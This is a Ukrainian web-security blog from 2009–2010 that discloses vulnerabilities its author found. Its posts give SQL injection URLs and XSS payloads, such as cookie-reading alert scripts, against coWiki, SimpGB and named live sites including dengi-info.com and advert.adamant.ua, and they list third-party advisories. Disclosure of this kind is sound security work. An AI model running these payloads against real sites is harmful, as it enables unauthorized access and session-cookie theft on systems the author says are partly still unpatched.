Websecurity - Веб безпека

12.09.2009

У січні, 23.01.2009, я знайшов SQL Injection уразливість в coWiki. Про що найближчим часом повідомлю розробникам.

Раніше я вже писав про XSS уразливість в coWiki.

Детальна інформація про уразливість з’явиться пізніше. Спочатку повідомлю розробникам системи.

21.07.2010

SQL Injection:

http://site/index.php?node=-1′%20or%20version()%3E’5

Уразливі coWiki 0.3.4 та попередні версії.

Ще коли я в 2007 році повідомив розробникам про XSS дірку, вони відповіли мені, що більше не відтримують даний движок (а цього разу взагалі не відповіли). Тому користувачам даної системи потрібно самотужки виправити цю дірку (як і попередню).

В даній добірці уразливості в веб додатках:

• HP ProCurve Threat Management Services zl Module (J9155A), Remote Unauthorized Access, Denial of Service (DoS) (деталі)
• BPstyle - Graphic studio SQL Injection Vulnerabilities (деталі)
• OS Command Injection in Cacti <= 0.8.7e (деталі)
• SQL Injection in Cacti <= 0.8.7e (деталі)
• Novell eDirectory iMonitor “Accept-Language” Buffer Overflow (деталі)
• Jcaptcha vulnerability (деталі)
• Amiro CMS<=5.4.4 PHP injection (деталі)
• XSS in Drupal Better Formats Module (деталі)
• Multiple Vulnerabilities in Cisco Wireless LAN Controllers (деталі)
• Cisco WLC 4402 Denial-of-Service vulnerability (деталі)

03.12.2009

У квітні, 17.04.2009, я знайшов SQL Injection та Cross-Site Scripting уразливості на проекті http://www.dengi-info.com (онлайн ЗМІ). Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливості з’явиться пізніше.

19.07.2010

SQL Injection:

http://www.dengi-info.com/archive/read.php?iid=-1%20or%20version()=5

http://www.dengi-info.com/news/?nid=-1%20or%20version()=5

XSS:

• alert(document.cookie)
• alert(document.cookie)
• цікавий
• html включення

Дані уразливості досі не виправлені.

В даній добірці уразливості в веб додатках:

• Lotus Sametime User Enumeration Vulnerability (деталі)
• Openpresse 1.01 Local File Include Vulnerability (деталі)
• Openplanning 1.00 (RFI/LFI) Multiple File Include Vulnerability (деталі)
• Openfoncier 2.00 (RFI/LFI) Multiple File Include Vulnerability (деталі)
• Apple Safari local file theft vulnerability (деталі)
• Apple Safari SVG Set.targetElement() Memory Corruption Vulnerability (деталі)
• Apple WebKit attr() Invalid Attribute Memory Corruption Vulnerability (деталі)
• Apple WebKit dir Attribute Freeing Dangling Object Pointer Vulnerability (деталі)
• XSS vulnerability in Zikula Application Framework (деталі)
• XSS vulnerability in Zikula Application Framework (деталі)

04.12.2009

У квітні, 17.04.2009, я знайшов Cross-Site Scripting уразливість на проекті http://video.i.ua (відео хостінг). Про що найближчим часом сповіщу адміністрацію проекту.

Останній раз стосовно проектів i.ua я писав про уразливість на board.i.ua.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

16.07.2010

XSS:

Це Strictly social XSS. Атака спрацює при кліку на “Мне 18″.

• alert(document.cookie)

Дану уразливість виправили, але погано, тому при невеликій модифікації коду, вона знову працює.

XSS:

• alert(document.cookie)
• цікавий

В даній добірці уразливості в веб додатках:

• New cacti packages fix missing input sanitising (деталі)
• Apache ActiveMQ is prone to source code disclosure vulnerability (деталі)
• Opencourrier 2.03beta (RFI/LFI) Multiple File Include Vulnerability (деталі)
• OpenCominterne 1.01 Local File Include Vulnerability (деталі)
• In-portal 5.0.3 Remote Arbitrary File Upload Exploit (деталі)
• IWD Group SQL Injection Vulnerabilities (деталі)
• Apple Safari & Quicktime Denial of Service (деталі)
• Multiple Vendor WebKit Error Handling Use After Free Vulnerability (деталі)
• Apple Safari Remote Memory Corruption Vulnerability (деталі)
• Apple Safari cross-domain XML theft vulnerability (деталі)

01.06.2010

У жовтні, 26.10.2009, я знайшов Cross-Site Scripting уразливості в SimpGB (причому це persistent XSS). Дані уразливості я виявив на одному сайті, де використовується даний веб додаток. Про що найближчим часом повідомлю розробникам.

Раніше я вже писав про уразливості в SimpGB.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам веб додатку.

14.07.2010

XSS:

Це persistent XSS в трьох функціоналах веб додатку.

POST запит на сторінках:

http://site/guestbook.php?lang=en&mode=new&layout=default
http://site/guestbook.php?lang=en&mode=new&layout=default&quote=1
http://site/admin/usered.php?lang=en&mode=comment&input_entrynr=1&entrylang=en

<script>alert(document.cookie)</script>В полі АВТОР (Name).

[swf width=1 height=1]http://site/flash.swf[/swf]В полі ТЕКСТ (Text).

Атака можлива на старих версіях флеш плеєра, де була менш жорстка політика безпеки і можна було виконати JS-код з флешек з зовнішніх ресурсів. В 9 і наступних версіях флеш плеєра атака спрацює лише якщо swf-файл буде на тому самому домені.

Уразливі SimpGB V1.37.3 та попередні версії. Як я перевірив, в SimpGB v1.49.01 вже немає першої уразливості, але все ще є XSS через Flash.

В даній добірці уразливості в веб додатках:

• Численні уразливості безпеки в lcms (деталі)
• Openreglement 1.04 (RFI/LFI) Multiple File Include Vulnerability (деталі)
• Apple Safari - Null pointer dereference (деталі)
• Apple Safari - Information disclosure (деталі)
• < Safari 3.2.3 Arbitrary Code Execution + PoC (деталі)
• Apple Safari <v4 Remote code execution (деталі)
• Madirish Webmail 2.01 (basedir) RFI/LFI Vulnerability (деталі)
• A XSS in User_ChkLogin.asp of PowerEasy 2006 (деталі)
• SmodCMS ‘config.php’ Arbitrary File Upload Vulnerability (деталі)
• phpegasus ‘config.php’ Arbitrary File Upload Vulnerability (деталі)

05.12.2009

У квітні, 17.04.2009, я знайшов SQL Injection, Full path disclosure та Cross-Site Scripting уразливості на сайті http://adamant.ua (зокрема http://advert.adamant.ua). Про що найближчим часом сповіщу адміністрацію сайта.

Стосовно проектів компанії Адамант раніше я писав про уразливість на holms.adamant.ua.

Детальна інформація про уразливості з’явиться пізніше.

12.07.2010

SQL Injection:

http://advert.adamant.ua/www/delivery/ac.php?bannerid=-1%20or%20version()%3E4

Full path disclosure:

http://advert.adamant.ua/www/delivery/fc.php?MAX_type=1

XSS:

http://advert.adamant.ua/www/delivery/fc.php?MAX_type=%3CBODY%20onload=alert(document.cookie)%3E

Дані уразливості вже виправлені (за рахунок оновлення движка).

В даній добірці уразливості в веб додатках:

• Artofdefence Hyperguard Web Application Firewall: Remote Denial of Service (деталі)
• CSRF in e107 (деталі)
• Vbulletin - Two-Step External Link XSS (деталі)
• Genera CMS Macro Web Media XSS Vulnerability (деталі)
• IBM Tivoli Storage Manager Remote Agent Service Buffer Overflows (деталі)
• Openregistrecil 1.02 (RFI/LFI) Multiple File Include Vulnerability (деталі)
• phpBB2 Portal Mod XSS Vulnerability (деталі)
• DBSite w/b CMS Multiple XSS Vulnerability (деталі)
• Southern-Suzuki (Auth Bypass) Remote SQL Injection (деталі)
• Пошкодження пам’яті в Apple iPhone (деталі)